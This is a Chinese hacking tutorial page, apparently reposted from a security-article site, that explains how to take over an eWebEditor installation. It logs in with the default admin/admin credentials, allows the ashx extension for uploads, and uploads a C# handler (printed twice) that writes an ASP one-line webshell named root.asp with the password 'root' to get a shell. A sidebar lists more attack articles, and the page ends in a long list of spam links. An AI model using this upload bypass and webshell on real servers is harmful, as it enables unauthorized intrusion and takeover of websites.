这是一个eweb入口(废话)
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {return false; }
}
}
然后直接访问它。。
![1.jpg 1.jpg](http://img.jbzj.com/file_images/article/201105/20252MP7-0.jpg)
用默认帐户密码admin admin进入
样式添加asa扩展名
直接上传asp马
到这里都是顺利的,但是。。当你访问马的时候。。
试过了小马,一句话,会出现同样的问题
解决方法:
在样式添加里加上扩展名ashx
创建一个1.ashx的文件, 上传,代码如下:
复制代码
代码如下:<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {return false; }
}
}
它会在当前目录生成一个root.asp的一句话木马,密码为root
然后连接一句话木马就可以啦~~
拿到shell
最近发表
- web 页面 一些sql注入语句小结_脚本攻防_网络安全_
- php disable_functions 函数列表_脚本攻防_网络安全_
- 用JavaScript防止网站被挂IFRAME木马的方法_脚本攻防_网络安全_
- ewebeditor 上传遇到防火墙限制的解决办法 图文_脚本攻防_网络安全_
- 讯时漏洞一小结_脚本攻防_网络安全_
- 微软的“后门”Ntsd的远程调试功能利用图解_入侵防御_网络安全_
- MSSQL2008一句话启用xp_cmdshell_入侵防御_网络安全_
- FCKeditor上传Getshell不要忘记htaccess_入侵防御_网络安全_
- 微软全系统建立隐藏账户漏洞分析_入侵防御_网络安全_
- 80sec网站感恩节被攻击事件分析_入侵防御_网络安全_
- Serv-U FTP Jail Break(越权遍历目录、下载任意文件)_入侵防御_网络安全_
- 本人网站一次被黑的经历与反思 心得与体会_入侵防御_网络安全_
- linux系统从入侵到提权的详细过程(图文)_入侵防御_网络安全_
- 一个百度应用差评引起的渗透 渗透百度应用全过程_入侵防御_网络安全_
- Linux下的匿迹隐藏方法_入侵防御_网络安全_
- 十种网络攻击行为介绍 您能顶住几个?_入侵防御_网络安全_
- 分享内网渗透域的经验积累_入侵防御_网络安全_
- 防止cain挂掉目标服务器的注意事项_入侵防御_网络安全_
- 什么是CC攻击,如何防止网站被CC攻击的方法总汇_入侵防御_网络安全_
- TCP/IP筛选限制登陆3389终端的解除方法[注册表]_入侵防御_网络安全_
- webshell低权限重启服务器的另类方法_入侵防御_网络安全_
- 黑客总结的实用的网站渗透步骤_入侵防御_网络安全_
- 一句话木马加密 过护卫神云查杀系统 过shell扫描器_入侵防御_网络安全_
- SQL注入中获取数据的一些技巧分析_入侵防御_网络安全_
- Mysql 另类盲注中的一些技巧小结_入侵防御_网络安全_
- 饶过Xplog70.dll玩入侵(参考防范)_入侵防御_网络安全_
- SQL注入攻击的种类和防范手段_入侵防御_网络安全_
- 手动mysql 高级注入实例分析_入侵防御_网络安全_
- 通过MySQL系统得到cmdshell的方法与防范_入侵防御_网络安全_
- 手工注入拿到管理员密码登陆后台 图文_入侵防御_网络安全_
友情链接
-
采集程序
网站源码出售
老域名出售页面
下载
游戏
网站导航
文章
源码下载
软件下载
游戏下载
资料
资源分享
六神
六神
海飞丝
海飞丝
噬元兽
噬元兽
bieha.cn
www.bieha.cn
缪缇(Miuti)内衣
缪缇(Miuti)内衣
dk028.com
www.dk028.com
四川福利
四川福利
bzbl.cn
www.bzbl.cn
mlft.cn
www.mlft.cn
7zz压缩
7zz压缩
91大神
91大神
刘亦菲
刘亦菲
sewai.cn
www.sewai.cn
58同城
58同城
鸭苗
鸭苗
caclrc.cn
rgbbs.cn
heiapp.net
zhfjx.cn
sshfy.cn
sxdgc.cn
28city.cn
www.caclrc.cn
www.rgbbs.cn
www.heiapp.net
www.zhfjx.cn
www.sshfy.cn
www.28city.cn
etc吧
etc吧
abdayah.cn
www.abdayah.cn
ddbdzs.cn
www.ddbdzs.cn
安思尔HyFlex
安思尔HyFlex
studyart.cn
www.studyart.cn
dndf.cn
www.dndf.cn
www.sxdgc.cn
11855.cn
www.11855.cn
11566.cn
www.11566.cn
11355.cn
www.11355.cn
62622.cn
www.62622.cn
cbwq.cn
www.cbwq.cn
www.zrqm.cn
zrqm.cn
rlfm.cn
www.rlfm.cn
www.pbtb.cn
pbtb.cn
knlz.cn
www.knlz.cn
rhwf.cn
www.rhwf.cn
dxfp.cn
www.dxfp.cn
rptb.cn
www.rptb.cn
nzjg.cn
www.nzjg.cn
ygnl.cn
www.ygnl.cn
人心不古
人心不古
rfbc.cn
www.rfbc.cn
rwbs.cn
www.rwbs.cn
img.liuyifei.net
drnu.cn
www.drnu.cn
bwsu.cn
www.bwsu.cn
wyim.cn
www.wyim.cn
dtud.cn
www.dtud.cn
远东运输集团
远东运输集团
中宠兽医联盟
中宠兽医联盟
拉贝洛尔
拉贝洛尔
飞行悍马
飞行悍马
uesese.cn
www.uesese.cn
爱坤
爱坤
02613.cn
www.02613.cn
lymzi.cn
www.lymzi.cn
KTOA
KTOA
73216.cn
www.73216.cn
www.crtwd.cn
crtwd.cn
深圳麦迪逊
深圳麦迪逊
kylkc.cn
www.kylkc.cn
dztmd.cn
www.dztmd.cn
pmhlw.cn
www.pmhlw.cn
gfxtk.cn
www.gfxtk.cn
桃子坪村
桃子坪村
京泊汽模
京泊汽模
sh3.cn
www.sh3.cn
7sh.cn
www.7sh.cn
民生人寿
民生人寿
安华农业保险
安华农业保险
华夏基违规操作举报电话
华夏基违规操作举报电话
金融消费权益保护投诉咨询电话
金融消费权益保护投诉咨询电话
钵钵鸡
钵钵鸡
r515.cn
www.r515.cn
g2050.cn
www.g2050.cn
bbc888.com
www.bbc888.com
博客